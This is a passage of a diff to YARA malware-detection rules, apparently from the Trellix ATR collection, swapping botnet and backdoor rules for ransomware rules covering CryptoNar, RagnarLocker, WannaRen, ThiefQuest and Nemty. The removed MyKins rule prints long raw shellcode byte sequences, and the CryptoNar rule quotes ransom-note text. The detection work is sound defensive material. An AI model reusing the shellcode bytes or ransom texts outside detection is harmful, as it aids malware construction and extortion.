4c63c0 4983f8ff } - $pattern_14 = { 49c1e002 e8???????? 03f3 4d8d349e 3bf5 7d13 } - $pattern_15 = { 752c 4c8d45af 488d55af 488d4d27 } + $1 = "boost::interprocess::spin_recursive_mutex recursive lock overflow" fullword ascii + $2 = ".?AU?$error_info_injector@Usync_queue_is_closed@concurrent@boost@@@exception_detail@boost@@" fullword ascii + $3 = ".?AV?$CipherModeFinalTemplate_CipherHolder@V?$BlockCipherFinal@$00VDec@RC6@CryptoPP@@@CryptoPP@@VCBC_Decryption@2@@CryptoPP@@" fullword ascii + $4 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii + $5 = "cipher.exe" fullword ascii + $6 = ".?AU?$placement_destroy@Utrace_queue@@@ipcdetail@interprocess@boost@@" fullword ascii + $7 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii + $8 = "CreateProcess failed" fullword ascii + $9 = "boost::dll::shared_library::load() failed" fullword ascii + $op1 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff } + $op2 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff } condition: - 7 of them and filesize <696320 + ( uint16(0)==0x5a4d and filesize <2000KB and (6 of them ) and all of ($op*)) or ( all of them ) } -rule TRELLIX_ARC_Shellcode_Mykins_Botnet : SHELLCODE FILE +rule TRELLIX_ARC_Cryptonar_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect the shellcode used in the MyKins Botnet" + description = "Rule to detect CryptoNar Ransomware" author = "Marc Rivero | McAfee ATR Team" - id = "9dc80b27-59e2-5925-9bb7-64a54241f52b" - date = "2018-01-24" + id = "0911250f-fc1f-58bc-ac09-d77d2a2ed3ce" + date = "2024-09-01" modified = "2020-08-14" - reference = "https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_shellcode_mykins_botnet.yar#L1-L27" + reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_CryptoNar.yar#L1-L36" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "5fa54c41a423d776d05bdac5b171ee685f54372b4e6aa41b57cce769ac2c6976" + logic_hash = "04c1c4f45ad3552aa0876c3b645c6ca92493018f7fdc5d9d9ed26cf67199d21b" score = 75 quality = 70 - tags = "SHELLCODE, FILE" - rule_version = "v1" - malware_type = "shellcode" - malware_family = "ShellCode:W32/MyKins" + tags = "RANSOMWARE, FILE" + malware_type = "ransomware" + malware_family = "Ransom:W32/CryptoNar" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $a = { 4883EC28E847000000488D0DF0FFFFFF488D1539000000482BCA4803C14883C428C3CCCC488D05D5FFFFFF482BC8488BC1C3CCCC4883EC28E83F0D000033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCE8000000005848B95510004001000000482BC148B950100040010000004803C1C3CCCCCC48897C24084C8BC94D85C0740C488BF9480FBEC2498BC8F3AA488B7C2408498BC1C3CCCC40534883EC20488BD9E85AFFFFFF488D0D53FFFFFF482BD94803C34883C4205BC3CCCCCC33D28BC2EB06FFC04883C10266391175F5F3C3CC668339004C8BC1740B4983C002664183380075F54C2BC20FB70266418904104883C2026685C075EF488BC1C34C8BC14C2BC20FB70266418904104883C2026685C075EF488BC1C3CC4C8BC14C2BC28A024188041048FFC284C075F3488BC1C3CC8039004C8BC1740949FFC04180380075F74C2BC28A024188041048FFC284C075F3488BC1C3CCCCCC48895C24084533D2458BCA4585C07E320FB702663901741A0FB719440FB7D88BC3412BC383F8207409442BDB4183FB20751041FFC14883C1024883C202453BC87CCE488B5C2408453BC8410F95C2418BC2C3CCCC4533C948895108458BC16644390A740D41FFC04963C06644390C4275F3664503C066448901664183C0026644894102C34883EC3833C04C8BD233D248895424228954242A668954242E66894424204885C9741A4D85D27415488BD1488D4C2420E89BFFFFFF488D4C242041FFD24883C438C3CCCC4883EC284863C14C8BCA4C8D44243833D233C94869C0F0D8FFFF488944243841FFD14883C428C3CC48895C241048897C241855488BEC4883EC604883651000488365C800488365D800488365E000488365F000488365F800498BD9498BF848894DC0488BC24C8D4DC04C8D45D0488D4D10BAFFFF1F00C745D030000000C745E840020000FFD0488B4D104885C9740DBA01000000FFD7488B4D10FFD34C8D5C2460498B5B18498B7B20498BE35DC3CCCC488BC44889580848896810565741544883EC308360D80083601800498BF18BEA4C8BE1498BD833FF4C8D4818488D50D88D4F054533C0FFD3894424208B44246085C0750733C0E9C20000008D14004533C033C9FFD6448B4424604C8D4C2460488BD0B9050000004503C0488BF0FFD38944242085C0740B33D2488BCEFF542470EBC28B4C246048B81986611886611886488BDE48F7E1482BCA48D1E94803CA48C1E908894C2460488B4B404885C9742E0FB743383BC57C262BC5992BC2D1F84C63C8781A8BC54A8D0C49992BC2498BD4D1F8448BC0E8AEFDFFFF85C0740B393B740B8B034803D8EBBE488B7B50488B4424784885C0740A4885FF7405488918EB0933D2488BCEFF542470488BC7488B5C2450488B6C24584883C430415C5F5EC3C20000CC4585C07410482BCA8A0288041148FFC241FFC875F3F3C3CC40534883EC20488BD9E8E6FBFFFF488D0DDFFBFFFF482BD94803C34883C4205BC3CCCCCC48895C2408488974241048897C24185541544155488BEC4883EC404863413C4C8BC1B90B020000488BF2C745E04D6D4765C745E474537973C745E874656D52C745EC6F757469C745F06E654164C745F46472657366C745F873006642394C00180F8584000000428B8400880000004533D24903C08B50208B58248B781C448B68184903D04903D84903F84585ED745B8B024533C94903C044380874234C8D5DE0488BC84C2BD8458A240B4584E47410443821750B48FFC149FFC180390075E741803C0100750842807C0DE000740E41FFC24883C204453BD57310EBB3420FB70C538B048F4903C0488906488B1E4885DB750883C8FFE9E1020000488D0D47340000E8D6FEFFFF488BD3488BC8E89BFCFFFF488D0D5034000048898690000000E8B8FEFFFF488B16488BC8E87DFCFFFF488D0D5A34000048898698000000E89AFEFFFF488B16488BC8E85FFCFFFF488D0D6C34000048894608E87FFEFFFF488B16488BC8E844FCFFFF488D0D8934000048894610E864FEFFFF488B16488BC8E829FCFFFF488D0D9E34000048894618E849FEFFFF488B16488BC8E80EFCFFFF488D0DAB34000048894620E82EFEFFFF488B16488BC8E8F3FBFFFF488D0DC834000048894628E813FEFFFF488B16488BC8E8D8FBFFFF488D0DE534000048894630E8F8FDFFFF488B16488BC8E8BDFBFFFF488D0D0235000048894638E8DDFDFFFF488B16488BC8E8A2FBFFFF488D0DF734000048894640E8C2FDFFFF488B16488BC8E887FBFFFF488D0DFC34000048894648E8A7FDFFFF488B16488BC8E86CFBFFFF488D0D0935000048894650E88CFDFFFF488B16488BC8E851FBFFFF488D0D0E35000048894658E871FDFFFF488BC8488B16E836FBFFFF488D0D2B35000048894660E856FDFFFF488B16488BC8E81BFBFFFF488D0D5035000048894668E83BFDFFFF488B16488BC8E800FBFFFF488D0D5D35000048894670E820FDFFFF488B16488BC8E8E5FAFFFF488D0D7235000048894678E805FDFFFF488B16488BC8E8CAFAFFFF488D0D8735000048898680000000E8E7FCFFFF488B16488BC8E8ACFAFFFF488D0D8935000048898688000000E8C9FCFFFF488B16488BC8E88EFAFFFF488D0D8B350000488986A0000000E8ABFCFFFF488B16488BC8E870FAFFFF488D0D95350000488986A8000000E88DFCFFFF488B16488BC8E852FAFFFF488D0DA7350000488986B0000000E86FFCFFFF488B16488BC8E834FAFFFF488D0DA1350000488986B8000000E851FCFFFF488B16488BC8E816FAFFFF488D0DA3350000488986C0000000E833FCFFFF488B16488BC8E8F8F9FFFF488D0DA5350000488986C8000000E815FCFFFF488B16488BC8E8DAF9FFFF488986D000000033C0488B5C2460488B742468488B7C24704883C440415D415C5DC348895C24085556574154415541564157488DAC2410FEFFFF4881ECF00200004533FF488BD9498BF8488BF2488D8DE100000041B80301000033D24C897C24504C897C24604C897C24704C897C24684C89BD480200004488BDE0000000E8EFF7FFFF488D4DC0C745C01C010000FF9688000000837DC40675488B45C885C0752780BDDA00000001754D83C8FF488B9C24300300004881C4F0020000415F415E415D415C5F5E5DC383F801742A83F802740583F80375D380BDDA000000017517EBC8837DC40A75C244397DC875BC80BDDA0000000175B3488BD7488BCBFF56384C393F74A541BD300000004C897C243041BE000000084C8D8D380200004C8D442478488D4C2460418D55DEBB00020000448974242848C785380200004729000044896C24784C897D80895D904C897D884C897D984C897DA0C744242040000000FF96900000004C397C24607509418D45CEE937FFFFFF895D90BB040000004C897C24304C8D8D380200004C8D442478488D4C24708D530241BC1F4C1000448974242844896C24784C897D804C897D884C89A5380200004C897D984C897DA0895C2420FF9690000000488B0F4C8D7708498BD64C8975B0FF5678488B4C2460C74424484000000044897C2440C744243802000000488D44245048894424304C8D85480200004533C94883CAFF4C897C242848C744242000200000FF9698000000488B4C2470895C244844897C2440C744243802000000488D44245048894424304C8D4424684533C94883CAFF4C897C24284C897C24504C89642420 } - $b = { E800000000582D051040000500104000C3558BEC8B45082D001040005DC20400558BECFF7508E80A0A000033C05DC20400558BEC8B4D1085C9741F0FB6450C69C0010101018BD153578B7D08C1E902F3AB8BCA83E103F3AA5F5B8B45085DC3558BECE899FFFFFF8B4D0881E90010400003C15DC20400558BEC8B4D0833C066390174084066833C410075F85DC20400558BEC8B450866833800568BF0740983C60266833E0075F78B4D0C2BF10FB7116689140E83C1026685D275F15E5DC20800558BEC8B55088B450C2BD00FB70866890C0283C0026685C975F18B45085DC20800558BEC8B55088B450C2BD08A08880C024084C975F68B45085DC20800558BEC8B4508803800568BF0740646803E0075FA8B4D0C2BF18A1188140E4184D275F65E5DC20800558BEC5633F63975107E2D8B45088B4D0C0FB704700FB70C71663BC174148BD08BC18BCA2BC883F92074072BC283F8207506463B75107CD333C03B75105E0F95C05DC20C00558BEC8B450C8B550850894204E8FAFEFFFF03C066890283C002668942025DC20800558BEC51515733C0668945F88D7DFAAB33C966AB5F394D08741A394D0C7415FF75088D45F850E8B3FFFFFF8D45F850FF550C8BC88BC1C9C20800558BEC51518B45086AFF9968F0D8FFFF5250E8730A00008945F88D45F8506A006A008955FCFF550CC9C20800558BEC83EC248B4508568945F48D45F4508D45DC5033F668FFFF1F008D45FC508975FC8975F8C745DC180000008975E0C745E8400200008975E48975EC8975F0FF550C3975FC5E740E6A01FF75FCFF5510FF75FCFF5514C9C21000558BEC83EC0C538D45FC5033DB538D45F8506A05895DF8895DFCFF55108945F88B45FC3BC3750733C0E99E000000565303C05053FF55148BF08D45FC508B45FC03C050566A05897514FF55108945F83BC374095356FF551833C0EB6F8B45FC33D2B9F8000000F7F1578945FC8B7E3C3BFB742E0FB746383B450C7C252B450C992BC28BC8D1F978198B450C992BC2D1F850FF75088D044F50E83BFEFFFF85C0740A8B063BC3740903F0EBC18B7E44EB028BFB8B451C3BC374083BFB74048930EB0753FF7514FF55188BC75F5E5BC9C21800C21400558BEC837D100074178B4D088B450C2BC88A10FF4D1088140140837D100075F15DC20C00558BECE8B3FCFFFF8B4D0881E90010400003C15DC20400558BEC83EC2C538B5D088B433CB90B010000568B750CC745D44D6D4765C745D874537973C745DC74656D52C745E06F757469C745E46E654164C745E86472657366C745EC730066394C18180F858F0000008B44187803C38B501C8B482003D3578B78248B40188955F033D203CB03FB8955FC8945F485C07466EB038B5D088B149183650C0003D3803A0074238D5DD42BDA8BC2895DF8EB038B5DF88A1C0384DB740D38187509FF450C4080380075E98B450C803C10007507807C05D400740E8B55FC428955FC3B55F472B0EB128B45FC0FB704478B4DF08B048103450889065F8B0685C0750883C8FFE9230200005068D0414000E8F0FEFFFF50E831FDFFFFFF3689464868F0414000E8DBFEFFFF50E81CFDFFFFFF3689464C6818424000E8C6FEFFFF50E807FDFFFFFF368946046844424000E8B1FEFFFF50E8F2FCFFFFFF368946086878424000E89CFEFFFF50E8DDFCFFFFFF3689460C68A8424000E887FEFFFF50E8C8FCFFFFFF3689461068CC424000E872FEFFFF50E8B3FCFFFFFF368946146800434000E85DFEFFFF50E89EFCFFFFFF368946186834434000E848FEFFFF50E889FCFFFFFF3689461C686C434000E833FEFFFF50E874FCFFFFFF36894620687C434000E81EFEFFFF50E85FFCFFFFFF36894624689C434000E809FEFFFF50E84AFCFFFFFF3689462868C0434000E8F4FDFFFF50E835FCFFFFFF3689462C68DC434000E8DFFDFFFF50E820FCFFFFFF368946306810444000E8CAFDFFFF50E80BFCFFFFFF36894634684C444000E8B5FDFFFF50E8F6FBFFFFFF368946386874444000E8A0FDFFFF50E8E1FBFFFFFF3689463C68A0444000E88BFDFFFF50E8CCFBFFFFFF3689464068D0444000E876FDFFFF50E8B7FBFFFFFF3689464468EC444000E861FDFFFF50E8A2FBFFFFFF368946506808454000E84CFDFFFF50E88DFBFFFFFF368946546830454000E837FDFFFF50E878FBFFFFFF36894658685C454000E822FDFFFF50E863FBFFFFFF3689465C6870454000E80DFDFFFF50E84EFBFFFFFF368946606890454000E8F8FCFFFF50E839FBFFFFFF3689466468AC454000E8E3FCFFFF50E824FBFFFF89466833C05E5BC9C20800558BEC81EC5C020000535633DB5768030100008D85A5FDFFFF5350895DF8895DE8895DDC895DF4895DFC889DA4FDFFFFE889F9FFFF8B7D0C83C40C8D85A8FEFFFF50C785A8FEFFFF1C010000FF574483BDACFEFFFF05751283BDB0FEFFFF02743983BDB0FEFFFF01EB2E83BDACFEFFFF06750E399DB0FEFFFF7510807DC201751983C8FF5F5E5BC9C20C0083BDB0FEFFFF0175ED807DC20175E78B751056FF7508FF571C391E74D95368000000086A408D45EC508D45C4506A0E8D45E850C745EC47250000895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF5748395DE875056AFE58EB955368000000086A048D45EC508D45C4506A068D45DCBE0B4C1000508975EC895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF57488B45108D480451FF30894DE0FF573C6A40536A028D45F850536800200000538D45FC506AFFFF75E8FF574C6A04536A028D45F8505356538D45F4506AFFFF75DC895DF88975EC895DF0FF574C395DFC0F84330200008B75F43BF30F8428020000895E048B85B4FEFFFF8946108B85ACFEFFFF8946088B85B0FEFFFF89460C6A0C5889462C8946308B4510C7060C3C1000C7462830000000C746342C000000C7463818000000C7463CA80100008B401C894618895D0C6840464000E800F8FFFF8BC88B450C8A0C0180F10D888C05A4FDFFFF4089450C3D040100007CD98D8DA4FDFFFF8D46405150E855F8FFFF6844474000E8C9F7FFFF508D464050E85DF8FFFF8B45108B40283BC3742C8B4E1883F902750A8B40200504020000EB0D83F90375158B40200500010000508D860001000050E80BF8FFFFE825F7FFFFB9881C400081E90010400003C189450C33C9EB038B450C8A04088B55FC88040A4181F94825000072EB535353680C3C100056FF572C8BF03BF37460536A0156FF57386A1053536A015356FF57348B75108946203BC37447C680040200004E8B4620C68005020000538B4620C680060200002E8B4620C68007020000658B4620C68008020000788B4620C68009020000658B462088980A020000EB038B75108B46243BC30F8497000000895D083958040F868B000000895D0C8B46248B4D0C8B8401DC0000008D4D105150895D10FF5714395D107455FF7510FF57683B06754B536A3053FF57048945E43BC3743DE833F6FFFF53B91E13400081E90010400003C18B4DFC6A0183C12051535053FF7510FF75E4FF57245353FF75F4FF75E4FF5728FF770C6A01E8C1F7FFFFFF45088B46248B4D0883450C403B48040F8278FFFFFFFF75E0FF574033C0E9CFFCFFFFFF75E0FF57406AFDE92AFDFFFF558BEC81EC0C020000565733F66A688D8540FFFFFF565089B53CFFFFFFE8DAF5FFFF83C40C6A0A5933C06A0A8975A88D7DACF3AB5989B510FFFFFF8DBD14FFFFFFF3AB8D45A8898538FFFFFF8D853CFFFFFF50FF7508C745C401000000C7852CFFFFFF02000000E8BBF8FFFF85C00F8582010000538D85F4FDFFFF50C785F4FDFFFF1C010000FF5580BBEC45400083BDF8FDFFFF05750353EB0568D0454000E86CF8FFFF8D4DCC51FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF6A1850E856F7FFFFFFB548FFFFFF8BF83BFE750C68D0070000E8B9F6FFFFEBB46888130000E8ADF6FFFF8D45A8508D853CFFFFFF5057E849FBFFFF85C00F85F8000000EB10FFB548FFFFFF68D0070000E882F6FFFF8B45C883781C0175E783BDF8FDFFFF05750E6808464000E8E5F7FFFF6A16EB0C68D0454000E8D7F7FFFF6A18598D9534FFFFFF52FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF5150E8BCF6FFFF } + $s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" fullword ascii + $s2 = "CryptoNarDecryptor.exe" fullword wide + $s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " fullword ascii + $s4 = "Do not delete this file, else the decryption process will be broken" fullword wide + $s5 = "key you received, and wait until the decryption process is done." fullword ascii + $s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" fullword ascii + $s7 = "Decryption process failed" fullword wide + $s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" fullword ascii + $s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." fullword ascii + $s10 = "johnsmith987654@tutanota.com" fullword wide + $s11 = "Decryption process will start soon" fullword wide + $s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" fullword ascii + $s13 = "DecryptionProcessProgressBar" fullword wide + $s14 = "CryptoNarDecryptor.Properties.Resources.resources" fullword ascii condition: - filesize <1KB and any of them + ( uint16(0)==0x5a4d and filesize <2000KB) and all of them } -rule TRELLIX_ARC_Dridex_P2P_Pdb : BACKDOOR FILE +import "pe" + +rule TRELLIX_ARC_Ragnarlocker_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect Dridex P2P based on the PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "57350c96-877e-57de-9465-df9f7eb6d656" - date = "2014-11-29" - modified = "2020-08-14" - reference = "https://www.us-cert.gov/ncas/alerts/aa19-339a" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_dridex_p2p_pdb.yar#L1-L25" + description = "Rule to detect RagnarLocker samples" + author = "McAfee ATR Team" + id = "58874f27-3070-52c9-bd96-337fdaa4499b" + date = "2020-04-15" + modified = "2020-10-12" + reference = "https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_ragnarlocker.yar#L3-L45" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5345a9405212f3b8ef565d5d793e407ae8db964865a85c97e096295ba3f39a78" - logic_hash = "c9c4db48435203cdb882eef8082efd8424bd13f1aa512cfb3082f365b9bc6e83" + hash = "9706a97ffa43a0258571def8912dc2b8bf1ee207676052ad1b9c16ca9953fc2c" + logic_hash = "2f31da9182a1b47fb1e7e4459461de4c496ec323ff13e622d3ce27ac8cce1912" score = 75 - quality = 70 - tags = "BACKDOOR, FILE" + quality = 68 + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Dridex" + malware_type = "ransomware" + malware_family = "Ransom:W32/RagnarLocker" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\c0da\\j.pdb" + $s1 = {2D 2D 2D 52 41 47 4E 41 52 20 53 45 43 52 45 54 2D 2D 2D} + $s2 = { 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 } + $s3 = { 5? 8B ?? 5? 5? 8B ?? ?? 8B ?? 85 ?? 0F 84 } + $s4 = { FF 1? ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 } + $s5 = { 8D ?? ?? ?? ?? ?? 5? FF 7? ?? E8 ?? ?? ?? ?? 85 ?? 0F 85 } + $op1 = { 0f 11 85 70 ff ff ff 8b b5 74 ff ff ff 0f 10 41 } + $p0 = { 72 eb fe ff 55 8b ec 81 ec 00 01 00 00 53 56 57 } + $p1 = { 60 be 00 00 41 00 8d be 00 10 ff ff 57 eb 0b 90 } + $bp0 = { e8 b7 d2 ff ff ff b6 84 } + $bp1 = { c7 85 7c ff ff ff 24 d2 00 00 8b 8d 7c ff ff ff } + $bp2 = { 8d 85 7c ff ff ff 89 85 64 ff ff ff 8d 4d 84 89 } condition: - uint16(0)==0x5a4d and filesize <400KB and any of them + uint16(0)==0x5a4d and filesize <100KB and (4 of ($s*) and $op1) or all of ($p*) and pe.imphash()=="9f611945f0fe0109fe728f39aad47024" or all of ($bp*) and pe.imphash()=="489a2424d7a14a26bfcfb006de3cd226" } -rule TRELLIX_ARC_Malw_Likseput_Backdoor_Pdb : BACKDOOR FILE +rule TRELLIX_ARC_Wannaren_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect Likseput backdoor based on the PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "2193daf8-016b-5f49-97ec-b821c8da22f6" - date = "2011-03-26" - modified = "2020-08-14" - reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_likseput.e" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_likseput_backdoor_pdb.yar#L1-L25" + description = "Rule to detect WannaRen Ransomware" + author = "McAfee ATR Team" + id = "f4f30d12-547d-5044-a4e5-b88bf359480f" + date = "2020-04-25" + modified = "2020-10-12" + reference = "https://blog.360totalsecurity.com/en/attention-you-may-have-become-a-susceptible-group-of-wannaren-ransomware/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_wannaren.yar#L1-L34" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "993b36370854587f4eef3366562f01ab87bc4f7b88a21f07b44bd5051340386d" - logic_hash = "2afc4b7e6a5f0d9fed9a075aebaac8157e843c83c55c3f2255431bb6a03459ec" + hash = "7b364f1c854e6891c8d09766bcc9a49420e0b5b4084d74aa331ae94e2cfb7e1d" + logic_hash = "0feb913b84eb0ecdda688f0cf0a5051798fe4fbce8a6ea959825985a81a6699c" score = 75 quality = 70 - tags = "BACKDOOR, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Likseput" + malware_type = "ransomware" + malware_family = "Ransom:W32/WannaRen" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\work\\code\\2008-7-8muma\\mywork\\winInet_winApplication2009-8-7\\mywork\\aaaaaaa\\Release\\aaaaaaa.pdb" + $sq0 = { 92 93 a91c2ea521 59 334826 } + $sq1 = { d0ce 6641 c1e9c0 41 80f652 49 c1f94d } + $sq2 = { 80f8b5 4d 63c9 f9 4d 03d9 41 } + $sq3 = { 34b7 d2ea 660fbafa56 0f99c2 32d8 660fbafaed 99 } + $sq4 = { f9 f7c70012355f 35c01f5226 f9 8d8056c800b0 f6c4b2 f9 } + $sq5 = { f5 f9 44 3aeb 45 33cd 41 } + $sq6 = { 890f c0ff12 44 b4a3 ee 2b4e70 7361 } + $sq7 = { 81c502000000 6689542500 6681d97a1e 660fabe1 660fbae1a5 8b0f 8dbf04000000 } + $sq8 = { 8d13 de11 d7 677846 f1 0d8cd45f87 bb34b98f33 } + $sq9 = { 1440 4b 41 e8???????? 397c0847 } condition: - uint16(0)==0x5a4d and filesize <40KB and any of them + uint16(0)==0x5a4d and filesize <21000KB and 7 of them } -rule TRELLIX_ARC_Havex_Backdoor_Pdb : BACKDOOR FILE +rule TRELLIX_ARC_MALW_Thiefquest : KEYLOGGER BACKDOOR RANSOMWARE FILE { meta: - description = "Rule to detect backdoor Havex based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "a667bb4e-8c38-59a6-8ae0-09c44961a687" - date = "2012-11-17" - modified = "2020-08-14" - reference = "https://www.f-secure.com/v-descs/backdoor_w32_havex.shtml" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_backdoor_havex_pdb.yar#L1-L26" + description = "Rule to detect the Evilquest/ThiefQuest malware" + author = "McAfee ATR Team" + id = "09b074f7-6899-574d-a7d6-4414509aaa78" + date = "2020-07-09" + modified = "2020-10-12" + reference = "https://www.bleepingcomputer.com/news/security/thiefquest-ransomware-is-a-file-stealing-mac-wiper-in-disguise/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_thiefquest.yar#L1-L46" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "0f4046be5de15727e8ac786e54ad7230807d26ef86c3e8c0e997ea76ab3de255" - logic_hash = "dc50475b1ff2194306a0295f71860e4cc5ae7e126daa5d401b98cd2a0aadf1dd" + hash = "5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b" + logic_hash = "d40a466b12188d545d3fbe2c9d7e3685dde1250ae1f25df2a72cdf93c470ae25" score = 75 - quality = 70 - tags = "BACKDOOR, FILE" + quality = 68 + tags = "KEYLOGGER, BACKDOOR, RANSOMWARE, FILE" rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Havex" + malware_type = "keylogger, backdoor, ransomware" actor_type = "Cybercrime" - actor_group = "Unknown" + malware_family = "Ransom:OSX/ThiefQuest" strings: - $pdb = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Phalanx-3d.ServerAgent.pdb" - $pdb1 = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Tmprovider.pdb" + $pattern_0 = { 01c1 48 83c102 48 } + $pattern_1 = { 8c1471 80c1c1 98 1c8c } + $pattern_2 = { d8974f0dc89a 9f c9 9adf70cd595390 } + $pattern_3 = { d897c56f028c 2393a0a42e92 8ea2c27affc2 f8 } + $pattern_4 = { 477006 baa6a1cb82 ae f9 e8???????? d8a32bd0d519 } + $pattern_5 = { d898ab5c757b 2f f26f 5d } + $pattern_6 = { bc007a846b 2b54adaf 93 35eddf38e6 cdd0 b246 } + $pattern_7 = { ae 49b00e 01d1 45da611b 44839db656691674 } + $pattern_8 = { 01c1 48 83c101 48 } + $pattern_9 = { 6be3c6 5c 99 ae ed bf370e2f47 } + $pattern_10 = { fd d7 43bd18fd6f06 7937 fa } + $pattern_11 = { 01c2 48 83c201 bf01000000 } + $pattern_12 = { d89825ed4469 29f1 5c e12d } + $pattern_13 = { d8992062f7f9 73ff 90 085fc6 } + $pattern_14 = { 01c1 6689ca 668995cefeffff e9???????? } + $pattern_15 = { 01c1 41 89c8 44 } + $pattern_16 = { d89935c487a7 bcdffa587c be6cadbb3c 185fc4 } + $pattern_17 = { 01c1 48 8b75a8 48 } + $pattern_18 = { 0000 48 8945f8 e9???????? } + $pattern_19 = { d89959d6472d a2???????? 3525c7eec9 95 } + $pattern_20 = { 01c2 48 83c203 bf01000000 } + $pattern_21 = { 4a7888 ab 23e7 cf 11f3 } + $pattern_22 = { d8982fbf222d 49 92 1d25b42bba } + $pattern_23 = { e2d7 8437 6b4696d9 92 9d a6 } condition: - uint16(0)==0x5a4d and filesize <500KB and any of them + 7 of them and filesize <124322606 } -rule TRELLIX_ARC_MALW_Fritzfrog : BOTNET FILE +rule TRELLIX_ARC_Nemty_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect Fritzfrog" + description = "Rule to detect Nemty Ransomware" author = "Marc Rivero | McAfee ATR Team" - id = "4c553279-7e0c-5602-944d-ad8a47edf4ea" - date = "2020-08-20" - modified = "2020-08-20" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_fritzfrog.yar#L1-L26" + id = "e9b133d6-fd77-5201-995d-c42bae7cde46" + date = "2020-02-23" + modified = "2020-08-14" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Nemty.yar#L1-L45" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "488c807ecf0a9e981b2c1f2f5bb2e3072952d11f7cbf3a354bc85dc8e88b8b09" + hash = "73bf76533eb0bcc4afb5c72dcb8e7306471ae971212d05d0ff272f171b94b2d4" + logic_hash = "d055286670516318c14dcf4e5873b96eede5e1dfb3ee978553fc11f1ac6b3252" score = 75 quality = 70 - tags = "BOTNET, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "botnet" - malware_family = "Botnet:W32/Fritzfrog" - actor_type = "Cybercrime" - hash1 = "103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046" + malware_type = "ransomware" + malware_family = "Ransom:W32/Nemty" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pattern = { 